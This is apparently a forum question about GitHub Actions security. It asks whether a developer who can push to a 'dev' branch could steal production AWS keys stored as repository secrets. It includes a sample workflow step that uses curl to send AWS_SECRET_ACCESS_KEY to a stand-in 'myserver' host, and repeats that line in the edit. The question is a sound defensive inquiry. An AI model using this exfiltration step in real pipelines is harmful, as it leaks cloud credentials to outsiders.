I may be missing something about Github Actions in production, because it seems that if a developer can commit to some branch of the repository they can obtain production keys which are stored as Github secrets.
Let's say I have two branches "dev" and "prod".
After push to prod branch I have Github action deploy.workflow which deploys my updates to AWS. The credentials (AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY) used in the Github action are stored as Github repository Secrets. All good for now.
Let's say we have a developer without access to prod branch. This developer can now make a new github action, push to "dev" branch and expose the secret keys!
The action would look something like this
on:
push:
branches: [ dev ]
jobs:
expose:
....
- name: Expose secrets
run: curl myserver/key/${{ secrets.AWS_SECRET_ACCESS_KEY }}
Looking at the logs of the action a developer will be able to find production keys!
Is there any way to protect against this?
EDIT: Turns out secrets are filtered out from the logs, but it's still possible to obtain them by sending to your server using curl. (code updated)
curl myserver/key/${{ secrets.AWS_SECRET_ACCESS_KEY }}- Markon